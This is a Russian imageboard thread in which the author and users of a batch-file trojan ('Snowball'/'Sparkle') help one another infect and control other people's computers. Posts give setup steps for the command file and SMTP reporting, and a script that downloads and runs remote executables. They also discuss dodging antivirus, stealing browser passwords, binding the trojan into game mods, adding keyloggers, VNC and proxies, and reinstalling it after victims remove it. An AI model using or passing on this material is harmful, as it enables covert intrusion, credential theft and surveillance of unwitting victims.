А поцчему раньше называлось hardamax, и было версии 4? Переписал с нуля что ли?
>>42215
Я использую следующую систему:
Если добавил новую функцию - плюсую вторую цифирьку, т.е. x.y+1.
Если переписал код (не то чтобы совсем с нуля, но, скажем, заменил повторяющиеся участки функцией) - плюсую первую цифирьку, т.е. x+1.y.
Если добавляю что-то революционно новое, придумываю новое название. В случае со Snowball - это запуск команд в отдельных процессах, что дает колоссальный плюс к надежности.
Может зойпилишь гит или svn репозиторий для своей личинки?
Я бы покоммитил
И да почему вы так дрочите на батники?
Почему нельзя взять написать на пиздоне сделать из это .exe, а потом в бекграунд отдавать?
>>42247
У нас тут своя атмосфера жпг. Хули надо? Уроки сделал? exe из пиздона, вообще охуеть.
http://www.py2exe.org/ ебать_ты_лох.жпг
>>42251
И вот еще как ты думаешь клиент дропбокса, написанный на пиздоне, работает?
На самом деле мне горит perdaq от batch и powershell, по сравнению с божественным башем, они просто пиздецки убоги
>>42253
Ты, кукаретик, блять собери сначала hello world и попробуй уложиться хотя бы в 2 метра. И чтоб self-contained, не расчитывал на msvcrt. И на вирустотале заодно проверь. Ну а там и приходи со своим кококо.
Зачем вообще вот всё это твоё кококо, шишка что ли дымится оттого, что перед 3.5 анонами выебнулся?
>>42254
Язык батников старше тебя в два раза, оттого и убогий. Ну, powershell - просто убогое говно, что поделать. Ну так не пиши на них, чего сразу пердак-то рвёт?
>анонами
>выебнулся
ЩИТО?! Сам то понял че спизданул, маня?
>>42255
Ну ладно похуй на пиздон, можно и на няшной написать раз тебе так печет, байтоебушка ты мой
>>42258
Так напиши, хуле ж. Тред свой запили с сапёром и шлюхами. Кукарекать-то какой смысл?
>>42260
Похуй - проходи же. У меня большая часть стада на китайском жопорезе, size matters.
>>42215
Пикрелейтед.
Ломающие новости из уютного инвалидного мирка батников: Иногда случается такая проблема, когда переменная равна единице, двойке или около того, а требуется записать ее в файл, типа
set huita=1
echo %huita%>test.txtи ничего не получается. В таких случаях я раньше писал в конце какой-нибудь символ (еще один знак «=», например, что можно наблюдать в разделе «:settings» личинки) или пробел, но это тоже не идеально.
Придумал такой костыль:
set huita=1
for /f "tokens=*" %%a in ("%huita%") do echo %%a>test2.txtЕсли вдруг кому надо. Хотя возможно, есть и проще способ.
И еще хотел спросить, кто-нибудь кроме меня использует скрипт «Sparkle»? Собрался переписать его, а то он снаружи-то работоспособный, а внутри страшненький, ибо писался без плана, по ходу возникновения различных нужд. Что нужно добавить, какие баги/неудобства обнаружены?
>>42544
Sparkle юзаю постоянно-очень удобная штука. единственное, что смущает, в некоторых командах дополнительные строки читаются сразу из special.txt, а хотелось бы их просто водить. только что это за команды- не помню
>>42545
Вроде бы во всех командах, где требуются дополнительные строки, их можно вводить вручную. Может, старая версия какая-то?
>>42546
может. а может меня просто глюкануло и нет такого.
а так, за время пользования не было ни одной ошибки.
>>42548
> или пробел
Пробел - тоже символ, тоже значимый. "1 " neq "1".
>>42547
точно, у меня старая версия была. И суть проблемы перепутал- там run можно было только вручную ввести.
>>42550
Хотя для пустой хуиты это не сработает, конечно. Ну да и нечего пробелы значимыми делать, нинужны.
>>42550
> ^%hunta%
Хм, действительно, работает. А я-то был уверен, «^» экранирует только один следующий символ, «%». А для пустой-то хуиты ничего не сработает, там надо затычку ставить, «if not "%huita%"==""».
Спасибо, так намного лучше.
>>42557
А вообще, постой-ка, постой-ка. Просто единицу - да, пишет. А, например, huita=limit=1 - уже нет. Забавно, но видимо вернусь к своему велосипеду.
>>42559
Действительно, без велосипеда не выходит. Шайтан-арба это cmd.
Хех, я такой глупый. Оказывается, при работе по ftp для смены папки на какую-нибудь глубоко вложенную не надо указывать по очереди, типа
cd папка
cd подпапка
cd подподпапка
а можно просто приказать "cd папка/подпапка/подподпапка", как в cmd. А я-то специальный костыль изобрел для разбирания пути на элементы.
Однако, в личинке менять не буду, ибо этот костыль там еще одну задачу решает, отделяет путь от файла и "ftp:".
Мой личный бложек
>>42604
Ты не поверишь, но можно и вообще cd не делать, а работать с полными путями.
>>42605
Хотел соврать, что и так это знал, но я этого не знал. Теперь попробовал. Это гораздо удобнее, да.
Вот бы ты ошеломил меня еще больше и сказал, что есть способ создавать сразу множество вложенных папок, типа "mkdir dir1/dir2/dir3", я бы совсем стал счастлив. Или чтобы они сами создавались при указании полного пути, которого пока не существует.
>>42648
Вот нет, mkdir -p в ftp не запилили, к сожалению. Конечно, если у тебя свой сервер с ftp, то есть варианты с site exec, но и тогда лучше не надо. Спиздят из личинки пароль, и гроб гроб кладбище твоему серверу.
Нашел некоторое время назад ftps.exe - программа хороша тем, что почти полностью совместима в плане синтаксиса со стандартным ftp.exe, но умеет в пассивный режим, и теперь в своих скриптиках заменяю используемый ранее ncftpput.exe на него.
И вот понадобилось мне сделать заливку на ftp целой папки с подпапками. И я знаю, как это сделать средствами bat, т.е. разобрать путь на составляющие, создать папки и все файлы куда надо раскидать. Но я чертовски боюсь, что в ftps.exe окажется такая готовая функция. В ncftpput.exe, например, есть. И если вдруг я напишу свой велосипед, а потом узнаю, что такая функция там уже готовая есть, свечение моего БАГРЕПОРТА затмит солнце, потому что опять почувствую себя обезьяной, невнимательно читающей справку.
Может, кто-нибудь чисто случайно (бывают же совпадения) уже использовал ftps.exe и знает точно о наличии/отсутствии этой функции? В справке не нашел, в гугле тоже - утилита не особо популярная.
Делаю новую версию скрипта Sparkle, хочу, чтоб сам заливал все необходимые файлы на сайт, чтоб, значит, зарегистрировал - ввел в настройки - и оно всё само оформилось.
>>42661
Ну, знаешь, если ты уже штатный ftp заменил, то ААААА НАСТАЛО ВРЕМЯ УСТАНОВИТЬ curl
>>42665
> УСТАНОВИТЬ curl
Зачем мне нужен curl, у меня нет времени, чтобы возиться с ним. Как и с прочими скриптами, для которых надо что-то устанавливать. Понимаю, они штука мощная, но я хочу, чтоб все было портативно и запускалось даже на чистой свежеустановленной винде без фреймворков и библиотек.
>>42681
Подожди, но ведь он не скрипт, а self-contained программа типа wget. Кстати, можно и wget им заменить.
>>42700
> self-contained программа типа wget
ААААА, черт, вспомнил же. Что-то в голове у меня это название перепуталось со всякими там перлами и питонами. Да, стоит попробовать.
Ответьте на один вопрос. Почему поделка ОПа до сих пор не отправлена на вирустотал или лично дяде жене?
>>42724
> до сих пор не отправлена на вирустотал
Лололо, я ж каждую новую версию туда отправляю вот уже... не помню сколько, с первых версий. Ты думаешь, есть кому-то дело до моего паруса одинокого на фоне стальных кораблей? Прям отправил батник, и тут же где-то взвыла сирена и загорелась вращающаяся красная лампа, и суровые бойцы невидимого антивирусного фронта вскакивают с постелей, съезжают по стальной штанге и прыгают за компьютеры, чтобы лично проанализировать его и вручную добавить в базы антивирусов.
https://www.virustotal.com/ru/file/5be24e73d95dc7b5fbb05fd38eef2759af35891b6694d4ec75d730a013295ff5/analysis/1364996207/
Кажется, вот последний результат, в хистори нашел.
>>42729
Ньюфага вопрос - а на что из пака, кроме самого батника, могут агриться антивири?
>>42754
ftprar.mp3
httprar.mp3
proxyrar.mp3
winvnc.mp3
Первые три - потому что там используется черезжопный метод сокрытия через запуск от system; последний - потому что remote control tool. Остальное вроде в белом списке.
>>42729
Ёба если хочешь могу сканить билды на платном сканере который не палит личинок.
>>42762
Не вижу необходимости, он и так не палит, но спасибо за предложение.
Я не понял - ОП слепил троянца из батников?
>>42766
Совершенно верно. И заметь, задолго до маэстро Бабушкина.
Делаю принципиально новую версию Sparkle, в принципе функционал близок уже к старой версии, осталось украсить да новые плюшки навешать, но дело-то вот в чем: новых плюшек мало, а все изменения чисто внутренние - код стал более структурированным и логичным. Снаружи-то особых изменений не заметно. Что бы такого выпендрежного туда запилить, чтоб сразу было видно: да, новая версия?
>>42772
Бро, а почему ты не хочешь изучить winapi, да работать с ним напрямую? Это ведь не так сложно, в отличае от батников. Да и полезные знания же.
>>42774
Я так и так на жизнь не программированием зарабатываю, так что батники скорее ради удовольствия. Впрочем, простые повседневные задачи на них решать тоже можно, так что и польза есть.
Если мыслить глобально, есть огромное множество хороших программистов на многих полноценных языках. Зачем нужен еще один начинающий, не факт что чего-то способный добиться? А вот скриптописец на батниках раз в сто лет но может пригодиться внезапно.
Впрочем, я может и наберусь однажды смелости, попробую на чистом Си или на делфи.
>>42775
>А вот скриптописец на батниках раз в сто лет но может пригодиться внезапно.
Оче сомневаюсь. Хотя даже VB-макаки пишут РПГ в Экселе: http://gizmodo.com/5992533/awesome-accountant-made-an-rpg-inside-microsoft-excel
>>42776
Чего сомневаться, если ИТТ наглядный пример? С бинарником на вирустотале сам знаешь, что происходит, хоть ты его пятью разными крипторами закриптуй. А вот разобрать полиморфный бат, который генерит полиморфный бат - нету таких аналитиков у дяди жени за разумные деньги. Вот и не детектится.
>>42777
> полиморфный бат, который генерит полиморфный бат
О, ты мне льстишь. Он всего лишь разбавляется рандомными комментариями, сам смыслонесущий код остается неизменным. Теоретически можно его по-настоящему обфусцировать, скажем добавить кучу ничего не делающих участков и разбить модули на осколки с безусловными переходами между ними, но я вряд ли смогу это делать автоматически.
Время от времени какой-нибудь антивирус (обычно аваст) начинает детектить батник как вирус. Тогда я ищу тот участок, который его возбуждает, переставляю местами строчки/подменяю переменными строчки и он перестает детектиться еще на несколько месяцев. Если интересно, можешь посмотреть в батнике, найдешь нужные места по слову «Аваст» и «др.Веб».
>>42781
!!snowball\программы с вирусами\!!! sparkle\
Это скрипт для автоматизированного формирования cheese.txt и отправки его на командные сайты.
>>42211
Продолжая рубрику ньюфажных вопросов,оп какие могут быть причины того что батник видит файл chesse.txt но при этом не качает файлы и не выполняет команды
>>42813
>батник видит файл chesse.txt
Как узнал, что он его видит? Какие именно команды подавал? Приведи пример заполненного cheese.txt
Вообще, как я заметил, самая распространенная проблема - неправильное заполнение cheese.txt.
>>42777
>С бинарником на вирустотале сам знаешь, что происходит, хоть ты его пятью разными крипторами закриптуй.
Знаю, 0/46 там происходит при использовании нормального крипта.
>>42820
Рекрипт. И да, на ВТ обычно не чекают то, что легко снимается.
>>42777
>С бинарником
>пятью разными крипторами
>разобрать полиморфный бат, который генерит полиморфный бат - нету таких аналитиков у дяди жени
Самому-то не смешно?
>>42823
У нас тут анонимная имиджборда для гуманитариев. Японских нарисованых девочек постить, понимаешь? Чего тебе тут надо, хакир?
>>42824
Пойду пожалуй к дяде Жене, раз у него так плохо с аналитиками, что
>всего лишь разбавляется рандомными комментариями, сам смыслонесущий код остается неизменным
- это уже неебаться полиморфность, которую не могут вскрыть даже самые высококлассные дипломированные аналитики.
>>42825
С таким чувством юмора будет тяжеловато. Да и платят не оче.
>>42840
!!snowball\! шаблоны obey\01. пароли браузеров\
Да.
>>42841
Всегда знал что поняши рулят.
Хотя, минус в твоей ситуации, что на кексы тебе кинуть что-нить не получится, в отличие, например, от Шинкуфага.
>>42842
> на кексы тебе кинуть что-нить не получится
Не нужно, я питаюсь вашей любовью :3
Сделал новую функцию - "tore", суть токова:
Иногда у пользователя много больших видеороликов в папке, по названиям/превьюшкам не понять, о чем они. Или есть куча больших архивов, и нужно посмотреть список файлов, что в них. Эта функция позволит от каждого файла откусить кусочек и получить кучу их. Типа как "cut", только не для одного файла, а для целой папки. Сейчас обкатываю, но вроде работает.
Только фиг знает, нужно ли. У меня в личинке и так изрядно команд, которые нужны бывают раз в сто лет.
С другой стороны, пусть лучше будет, но не понадобится, чем понадобится, но не будет. Пара килобайт погоды не делает.
>>42872
Пилите, Шура, пилите.
Чому бы и нет, лишь бы в радость.
И, на правах школьника-гуманитария, вопрос:
Какие это вы книжки читали, что создали тут, как я вижу, просто боевое крыло двача? Я не хотел никого обидеть
Прошу прощения за свой идиотизм, но у меня нихуя не работает. Может кто подскажет, что я делаю не так?
Создаю почту на mail.ru, сайт на wen.ru
Открываю xvid.bat в akelpad и привожу строки к виду:
set site=логин.wen.ru
set site0=логин.wen.ru
set site1=логин.wen.ru
set itsme=anon
set group=test
заливаю на сайт содержимое папки сайт.
запускаю xvid.bat
в фаил cheese.txt на сайте вписываю:
sugarcube,012
smtp
smtp.mail.ru
логин@mail.ru
пароль
test
anon
screenshot
На почту нихуя не приходит.
В чем может быть дело?
>>42887
Спасибо, бро, разобрался. Процессхакер помог. Я как последний долбоеб не стал заливать Alert.txt а отключить уведомление забыл.
>>42887
>SL-кун еще кой-чего советовал
Кто таков, чем знаменит, что советовал?
>>42889
СЛ кун запилил странжлов, батник работающий из под радмина который творил очень много годноты.
Кстати ёба, ты с ним еще слышишься? Он еще жив? В конце концов он запилил странжлов 2.0?
Няша, подскажи, как склеить все в проге c эксешником?
Алсо + в карму.
>>42889
Ньюфаг, хули ты тут забыл? Иди читай архивы сл-тредов. Наприходят тут из хуйвтактика, потом еще и сами ничего изучать не хотят - обо всем спрашивают. Нахлебники.
>>42892
Он же ушёл раковать на форум к извращенцам, а потом вообще съебал в никуда.
>>42895
А, лол, понял, это некий тут, кто есеты всяческие за защиту считает, да ещё и рекомендует. Ну извините, не имею привычки запоминать каждого поперечного неймфага. А ты подсиралой будешь или он и есть, только трип снял? :3
>>42888
> не стал заливать Alert.txt а отключить уведомление забыл
Хм... Ответ на команды из командного файла все равно должен был прийти, alert в отдельном процессе обрабатывается. Я попробую у себя повторить эту ситуацию.
>>42892
Нет, не общаюсь, ничего о нем не слышал с того времени, как он отсюда ушел.
> как склеить все в проге c эксешником
!!snowball\пример инсталлятора\ например, ты об этом? Или что с чем склеить, я не понял.
>>42898
>А, лол, понял это ваше местное сокращение литхекк с ПРЕВАТАМИ на БАТАХ
быстродобавил
>>42899
Хитрыйплан мод on
Беру мод для СКУРИМА, склеиваю его с личинкой, выкладываю на плейграунде.
?????
PROFIT
>>42901
Если мод единым исполняемым файлом, то получится. Если нет, то нет.
Спасибо.
>>42906
Хотя вроде ожил, скачал wget, судя по всему пытается отправить алерт и инфу по запросу hey но ничего не приходит.
>>42906
> пингует локалхост
Все ок, это такой суррогатный таймер.
Попробуй принудительно завершить этот svchost.exe (ping.exe) и понаблюдай в процесс хацкере, что произойдет и на каком этапе облом.
Должны запуститься следующие процессы:
1. Еще раз запустится svchost.exe, но пинговать будет не локалхост, а твой сайт, -n 5
2. Запустится spoolsv.exe (wget.exe) и попытается скачать cheese.txt (ты увидишь это в процесс хакере, в параметрах процесса)
3. spoolsv.exe попытается скачать ctrl.txt
4. Если cheese.txt прочтен и выполняется, spoolsv.exe попытается скачать postie.mp3. Хотя возможно, он уже скачан и лежит в %temp%\postie.exe
5. Если успешно, запускается postie.exe и пытается отправить письмо.
Ты на виртуалке запускаешь? Там может быть такой нюанс, через nat (хотя хз в чем причина) не работает виндовый ftp и не скачивает wget. Проверь, лежит ли в папке со скриптом (%appdata%\web) файл spoolsv.exe, и если нет, значит он еще не скачался. Нужно просто подольше подождать, он в первую очередь пытается скачать со сторонних ftp и лишь потом с сайтов. Ну или если невмоготу ждать, несколько раз заверши svchost.exe, когда он в фазе "-n 300"
Уфф, запутанно вышло, боюсь перечитывать что написал
>>42908
> пытается отправить
postie.exe в процессах, но письма нет? Попробуй следующее:
1. Положи postie.exe в какую-нибудь папку
2. Туда же положи файл test.bat следующего содержания:
cd /d %~dp0
postie.exe -esmtp -user:тот_юзер@mail.ru -pass:пароль -host:smtp.mail.ru -to:тот_юзер@mail.ru -from:тот_юзер@mail.ru -s:test -msg:"test"
pauseВыполни и посмотри, отправится ли, и если не отправится, в чем проблема.
>>42910
Спасибо. Не подскажешь, что это значит?
>>42913
Да в целом понятно, что не получается подключиться к smtp серверу, не понятно почему.
>>42913
> лучшие традиции
Отож :3
>>42911
Раз postie скачался, значит интернет как бы есть, однако в то же время для postie его как бы нет. Брандмауэр? Попробуй со своего компа также отправить.
Гугли.
http://www.google.ru/search?q=%D0%BE%D1%88%D0%B8%D0%B1%D0%BA%D0%B0+10060
>>42915
Это получается несколько ебанутая ситуация, если стандартный в XP брендмауер не позволяет работать этой личинке.
>>42916
Думаю, это не он, у меня на виртуалке отправляет со включенным.
>>42916
>Это получается несколько ебанутая ситуация, если стандартный в XP брендмауер не позволяет работать этой личинке.
Чому это? Вполне нормальная. Нет, не хотим годноту пилить хотя бы по паблик сорцам с минимальными обходами, хотим непонятно что на батниках делать.
>>42917
Я главное утром сегодня ебался с этим всем и в конце концов заставил это все работать. Помогло(как мне тогда казалось) закидывание на сайт alert.txt. Потом в состоянии аффекта удалил все к хуям с сайта вместе с виртуалкой, дабы повторить нормально уже вечером. И нихуя не работает лол. У меня мозговой штурм сейчас, пытаюсь вспомнить что же я сделал. Вообще часто эта личинка не работает?
>>42919
Ну и еще у меня подозрение, что на сайте у меня что-то не так. Та как утром письма пошли после упорного изучения и изменения содержимого сайта.
>>42919
> часто эта личинка не работает
Начиная с версии Snowball - практически без отказов. Раньше да, бывало, сейчас по крайней мере не вылетает и не зависает, ибо в отдельных процессах, да и там в случае ошибки отправки почты еще две попытки предпринимается. На моих компьютерах работает без ошибок.
Ты менял что-то в содержимом сайта, кроме cheese.txt? Попробуй перезалить его, сайт, полностью. Но все же у тебя проблема с postie, Как можно видеть, так что не поможет.
>>42921
ну у меня на виртуалке видимо да, проблема с postie. Но я же не только у себя запускал лол.
>>42921
Короче из четырех хомяков заработало только на одном. Почему так может быть, не подскажешь?
>>42923
Если работает на одном, то работает на другом, а если нет, то это уже следствие специфики хомяков
>>42926
Нет в мире совершенства. Спасибо, бро. ГДЕ STRANGELOVE 2.0, СУКА?!
Короче не знаю почему, но postie не работает почти всегда и почти на всех хомяках, хотя сама личинка функционирует. На фтп приходят файлы весом 0 Кб. Что с этим делать, не подскажете? ftp у себя поднял.
котаны поясните за впаривание софта хомячкам, склейкой? что вообще происходит, у меня рвется шаблон от такого колличества файлов в паке
Сап посани, необходим бот на батнике.
Функции - основные для ддоса, стиллер, возможность прикрутить непалевный майнер например, это можно найти в этом йоба пакете?
вт
20/39
пинч с паблик криптом меньше палится
Посоны, есть два компа на одном из которых эта личинка, и роутер Tp-link с паролем admin admin лол. Вопрос нубский, но как получить прямой доступ? VMC установил(вроде), но подключиться хз как, какой порт не знаю. Гуглил, пробрасывал, не подключается.
С помощью этой личинки можно радмин прикрутить? С ним как то привычнее.
>>42931
https://www.virustotal.com/ru/file/ddf0999f17becf885817d98a9b49b80ac2634f5b5f88814f2d61f7605295cf96/analysis/1366202041/
Ноуп.
> роутер Tp-link с паролем admin admin
Он, по-моему, тебя снаружи не пустит ни на какой порт. У тебя два варианта:
1. Установить ему прокси, подключиться, зайти на http://его_ip. См. команду "makeproxy"
2. Установить ему программу удаленного контроля. Например, командой "makevnc". Но у него же роутер, там надо всё это дело настраивать.
>>42929
> впаривание софта хомячкам, склейкой
goto >>42899
>>42930
> Функции
Стилер паролей там есть (шаблоны obey), остальное сооруди вручную и запусти какой-нибудь из команд, типа "run".
Мальчишки, есть у кого-то желание потестить Sparkle 2.0?
http://rghost.ru/45352966
Пик релейтед.
Настройки совместимы со старой версией, так что можно заново не вводить, просто заменить settings.txt.
>>42937
Хуй таМ, не работает прокси. Блядь, обидно, неужели ниче сделать нельзя? Я знаю, что хозяин компа подключается с работы к себе по радмину.
>>42937
>Ноуп.
Т.е. xvid.bat - всё, что мне нужно для запуска и эксплуатации личинки, да?
>>42937
Ты мне лучше скажи, почему у меня у 80% хомяков не работает postie. И почему на ftp приходят файлы весом 0 байт. Если посоветуешь как лечить, буду очень благодарен.
>>42943
Пробросил 4899, не коннектит. Пробовал с портами проброшенными - хуй.
>>42944
Так может у него там фильтр строит на радмине. Ты же говоришь, что у тебя там уже есть засранчик - так чего мы тут гадаем за тебя?
>>42945
Да я полный нуб в этих вопросах, вообще не ебу что можно предпринять. Ладно, буду думать.
>>42948
Не через радмин ли, из-под пользователя system, запускал ты личинки?
>>42962
Он наверное всю пачку проверял. А там поди угадай, что именно он детектит. VNC, скорее всего.
Посоны, а кейлогер есть? И если нет, то как прикрутить?
>>42981
1. google кейлоггер без смс на высокой скорости скачать
2. google кейлоггер сделать установщик
3. Команда "run"
>>42984
Принято. Вопрос номер два. После getfile он удаляет архивы? Если нет, то как удалить?
>>42987
> После getfile
После getfile там всего один архив и он будет удален. Вот после getfiles архивы остаются; удалить можно двумя способами:
1. Выполнить "getfiles", не указав ни одного файла для отправки - старые архивы будут удалены, а новые не будут созданы;
2. Выполнить "execute" c параметром "rd /s /q "%temp%\files""
Спасибо, бро.
>E:\Мои фотки\Палево\ЊлвЁйЁ\‚леЁ 086.jpg
Дело не в кодировке cheese, все скачивается отлично, это в названии файла и папки косяк с кодировкой. Что делать? Качать не хочет.
>>42999
Хм... попробуй:
getfiles
E:\Мои фотки\Палево\*086.jpg>>43003
неа. Collect тоже не помогает. Пишет, что найдено 122 файла(правильно) размером 0 байт. И не качает.
Кстати, никто не заморачивался с vpn? Взлетит?
>>43008
Зачем он тебе? Только ради прокси - дикий оверкилл.
>>43016
>это что например?
C, например. Не знаю, зачем ты спросил.
>>43016
>Качественные, это что например?
Нормальные боты с обходами, да хоть лодырь обычный из паблика возьми.
>Ну прямое соединение же, заебись.
Я про то, что ты из пушки по воробьям. Есть же сокс, реверс-сокс, ssh-туннель, stunnel и ещё куча возможностей устроить из жертвы проксю. Нахрен тебе впн целый поднимать ради прокси?
Ёба, такой вопрос, если личинка будет качать какой-нибудь файл, на который у АВ шишка дымиться, АВ в берсерке не снесёт саму личинку?
Для инсталлера когда собираю sfx архив надо ставить галочку на Solid archive или нет?
>>43067
Пикрелейтед - солидный, например.
Ничего не работает, тестил на двух ПеКа. Что делал:
Создал фейкомыло на mail.ru и сайт на wen.ru. Прописал в xvid.bat:
set site=логин.wen.ru
set site0=логин.wen.ru
set site1=логин.wen.ru
В cheese.txt прописал:
sugarcube,x1x
smtp
smtp.mail.ru
фейкомыло@mail.ru
пароль
everypony
everypony
info,screenshot
Больше ничего не меняя, запихул батник в инсталлятор и запустил. Батник расквартировался где надо и запустился, однако ни через пять минут, ни через полчаса ни инфа, ни скриншот мне не прилетели.
Пробовал перезагружать печку, делать хуйцы, сосать бочку. Не помогает. Сайт залит полностью, пробовал заходить из браузера - работает. Все файлы в кодировке OEM 866. Что я сделал не так?
>>43075
UPD: Личинка видит cheese.txt и находится в быстром режиме, однако команда не выполняется.
>>43076
В папке %temp% появился файл postie.exe? Если нет, ты все файлы на сайт залил?
>>43077
Файл есть. Мыло я указал правильно, но всё равно письмо не приходит.
>>43078
у меня такая же хуйня, где-то 100 хомяков, но по почте отчет отсылают штук 5-10.
Попробуй через фтп.
>>43079
Походу, облом у меня. Сервак упорно не желает работать через роутерожопу, а домашние не поймут, если я напрямую подключусь. Аноны, посоветуйте ФТП-хостинг с активным режимом, уже несколько перепробовал и все только в пассиве работают.
Если я такую хуету в obey.txt залью
spoolsv.exe http://site/huita.exe -O "%temp%\huita.exe"
dir "%temp%"
start /d "%temp%" huita.exe
ping localhost -n 300 >nul
spoolsv.exe http://site/huita2 -O "%temp%\huita2.exe"
dir "%temp%"
start /d "%temp%" huita2.exe
tasklist
После запуска первой хуиты, будет висеть окно промпита 300 секунд перед запуском второй хуеты? Или батник Obey запускаеться скрытно?
>>43080
> ФТП-хостинг с активным режимом
http://net2ftp.ru/
Этот с активным.
Если я правильно понял, у минимум двоих проблема именно с postie. Аж 9 из 10 не работают. Я не понимаю, в чем причина. Извините за заезженную фразу, но у меня все работает. Какие-то особо хитрые роутеры у ваших хомяков, что ли?
Там есть еще резервные способы - по http, посмотрите в хелпе. Помню, когда-то давно, когда я личинку еще не выкладывал тут, один товарищ сделал веб-сервис, к которому личинка обращалась, скачивала пустой файл с параметрами, и эти параметры (имя/группа/версия) отображались на веб-странице. Когда я обновил личинку на версию, которая к этому сервису обращалась, у меня выплыло где-то еще 20% личинок, т.е. которые по каким-то причинам не отвечали иначе. Хз, фигня это конечно, но хоть что-то.
Кстати, еще предположение: может, письмо не проходит спамфильтр? Была такая фигня с отправкой info. Попробуйте мейл.ру, что ли, я им пользуюсь.
>>43081
> батник Obey запускаеться скрытно
Да, все будет ок, только dir там непонятно зачем. А тебе не удобнее ли будет использовать команду run два раза? Или тебе критично, чтоб именно с таким интервалом?
> ться
Убью.
>>43082
>Кстати, еще предположение: может, письмо не проходит спамфильтр? Была такая фигня с отправкой info. Попробуйте мейл.ру, что ли, я им пользуюсь.
Я тоже мейлру пользуюсь.
>Аж 9 из 10 не работают.
Меня это не сильно напрягает, главное что-бы они работали, я потом через них заливаю свою личину.
>А тебе не удобнее ли будет использовать команду run два раза? Или тебе критично, чтоб именно с таким интервалом?
Первый ехе чистилка старой личины, второй новенькая закриптованная личинка.
>Убью.
Убивай меня полностью. :3
>>43082
Этот ФТП что-то тоже не желает работать.
>Какие-то особо хитрые роутеры у ваших хомяков, что ли?
Оба тестовых компа подключены через самый обычный вай-фай маршрутизатор от D-link. По идее, мешаться сей девайс не должен.
>Кстати, еще предположение: может, письмо не проходит спамфильтр? Была такая фигня с отправкой info. Попробуйте мейл.ру, что ли, я им пользуюсь.
Я там и зарегистрировал почту, но письмо даже в спаме не появлялось.
>>43084
Ёпт, я хуею. Через день простоя личинка ВНЕЗАПНО выдала мне на фтп скрины и инфу с компов.
>>43087
В общем, путём проб, ошибок и суточной еботни вывел некоторые выводы. ОП, советую добавить это в хелп и в следующий ОП-пост:
1. Через вай-фай личинка не работает. Либо вообще ничего не посылает, либо посылает хуиту в 0 байт.
2. Однако через проводное соединение (даже если есть роутер) всё работает прекрасно.
3. Если хомяк вставляет флешку или DVD-диск в момент снятия списка файлов, то личинка палится (выдаёт сообщение "Вставьте диск в дисковод").
4. Если врублен брандмаузер, то личинка палится (брандмаузер начинает вякать на ftp.exe).
5. Если попробовать личинкой скачать вишмастер, то антивирус (по крайней мере, Microsoft Security) впадает в тантрум и выпиливает личинку, а так же всё, что попадёт под руку, лол.
>>43088
эмм..
1)у меня есть личинки, сидящие через вафлю. В принципе, соединение не важно. По крайней мере, если используешь для связи мыло.
2)Качал хреново закриптованый кейлоггер, антивирус взбугугрился на него, но личинка работает до сих пор. С MSE и авастом точно такая фигня.
Ёба, у меня тут такое предложение.
Вместе с личинкой ставить батник в какой-нибудь другой директори, который проверяет есть ли основная личнка или её потёрли, если потёрли устанавливает с сайта новую личинку, с цтарую или новую директори.
Дело в том что у меня один хомяк на глазах выпилил личинку.
Еще у меня есть подозрение что некоторые ав выпиливают саму личинку когда пытаешься через неё что-нибудь качать, или по крайней мере палит её.
А с такой системой, хомяк остаёться подстрахован, если и выпилят основную личинку, хитробатник спрятянный в ебенях шиндовса скачает новую.
Запилишь пожалуйста?
>>43150
Вообще-то давно такую мысль вынашиваю, watchdog приделать, но вот минусы как бы тоже есть: джва процесса вместо одного, две записи в реестре вместо одной, опять же если личинка уже скомпрометирована, что толку ее восстанавливать, снова будет удалена.
В первых версиях, еще когда компилил QBFC, кстати, была такая шуточная функция - при удалении личинки срабатывал триггер и пользователю показывалась сценка с грустной GLaDOS.
Хз, посмотрю как это можно сделать умно.
Странная штука вот: где-то с месяц назад один знакомый попросил меня об удаленной помощи, и я с его согласия на его ноут установил личинку с рассчетом, что позже через нее окажу ему помощь. Он сказал, чо ему надо, и оставил ноут включенным, но я так и не получил ответа. И вот сегодня ВНЕЗАПНО эта сучечка выходит на связь. Хз, в чем дело, то ли postie, то ли проблема в скачивании с сайтов.
>>43158
Вообще-то судя по тому, что сейчас-то регулярно отвечает, проблема была в том, что личинка все это время не могла скачать wget, наверное. Так что по возможности следует его прилагать, меньше процент отказов будет.
>>43158
ну можно замаскировать процесс, назвать его например svchost.exe и переустанавливать личинку например в \WINDOWS\system32\ там куча всяких файлов хуй найдёшь что-нибудь.
QBFC? Что такое? Ни разу не слышал.
>>43166
>например в \WINDOWS\system32
Попытавшись затереть оригинальный? Отличная идея!
>>43167
Вы поехавший?
Я же сказал - переустановить.
Это значит что когда хомяк потрёт личинку из своей обычной директории она переустановиться в другую.
А с переиминованием в svchost.exe не обязательно сам бинарник переиминовывать в svchost.exe его как угодно назвать можно, главное что-бы в диспетчере задач отображался как svchost.exe.
Как бы тебе объяснить...
Знаешь, в начале прошлого века у пулеметов и даже снайперских винтовок были броневые щитки, ну ты видел наверное в фильмах. А затем перестали их монтировать на пулеметы. Зато стали уделять внимание маскировке, беспламенной и бездымной стрельбе, охлаждению ствола например, чтоб не светился.
А еще до этого были рыцари в латах в палец толщиной. А как огнестрельное-то оружие в моду вошло, латы поскидывали, и постепенно все переоделись в камуфляж.
Как думаешь, почему?
Потому что лучший способ защиты в современной войне - маскировка, а не броня. Оружие сейчас слишком хорошее. Если ты обнаружен - броня твоя похуй, от мины сверху щиток не спасет.
В нашем случае - если личинка уже обнаружена, что толку ее восстанавливать? Снова удалит. И еще и еще раз удалит, и найдет истоки. Сам не найдет - пригласит «Пацана, который в компах шарит». Хакир не найдет - так просто винду переустановят с форматированием. Единицы скажут «Окай» и будут терпеть, ящитаю.
И тут есть такой нюанс: иногда больше маскировки значит меньше маскировки. Сам понимаешь, снайпер в камуфляже «Леший» в центре города будет более заметен, нежели, например, в потёртом абибасе. Начнешь чересчур прятаться - антивирус проснется и заметит. Поэтому личинка пишется в appdata, а не в windir, и автозагрузка в hkcu\<...>\run, а не в winlogon, как хорошая программа, например.
Заменить процесс «cmd.exe» на «svchost.exe» в принципе можно, надо cmd.exe под этим именем куда-то скопировать и оттуда запускать. Посмотрим.
>>43170
Я бы на месте антивируса, увидев в hkcu/../run нечто, лежащее в appdata, сделал бы так: форман.жпг
Хотя, всякое говно типа vksaver так и делает, и, вроде, ничего.
>>43169
>главное что-бы в диспетчере задач отображался как svchost.exe
Вот только для этого надо не на BAT писать, лол.
>>43174
> всякое говно типа vksaver
GUUUGL XHROM
Яндекс-хуйня
Мейлру-хуйня
А антивирусы не фейспальмят, они с ними в сговоре.
>>43175
